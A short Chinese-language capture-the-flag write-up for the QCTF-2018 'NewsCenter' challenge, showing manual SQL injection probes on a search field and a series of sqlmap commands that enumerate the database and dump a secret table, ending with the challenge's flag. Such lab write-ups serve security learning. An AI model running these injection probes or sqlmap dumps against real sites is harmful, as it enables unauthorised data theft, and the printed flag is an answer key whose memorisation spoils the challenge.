MENU

文章目录

    QCTF-2018-NewsCenter-writeup

    • 为什么要写已经结束很久的题的writeup:因为在做某CTF训练平台的题

    首先打开网站,是一个搜索界面,随便搜索下,好像没什么反应:

    试试有没有注入:

    • a':空白界面
    • a and 1=1:没返回内容
    • a and 1=1 and '%'='%:没返回内容

    好像没啥可注入的,那看下包吧,上burp,发现是post发包:

    那么存为1.txt,用sqlmap跑:
    python sqlmap.py -r 1.txt -p search --dbs

    python sqlmap.py -r 1.txt -p search -D news --tables

    python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns

    python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump

    得到flag:QCTF{sq1_inJec7ion_ezzz}

    最后编辑于: 2019 年 07 月 13 日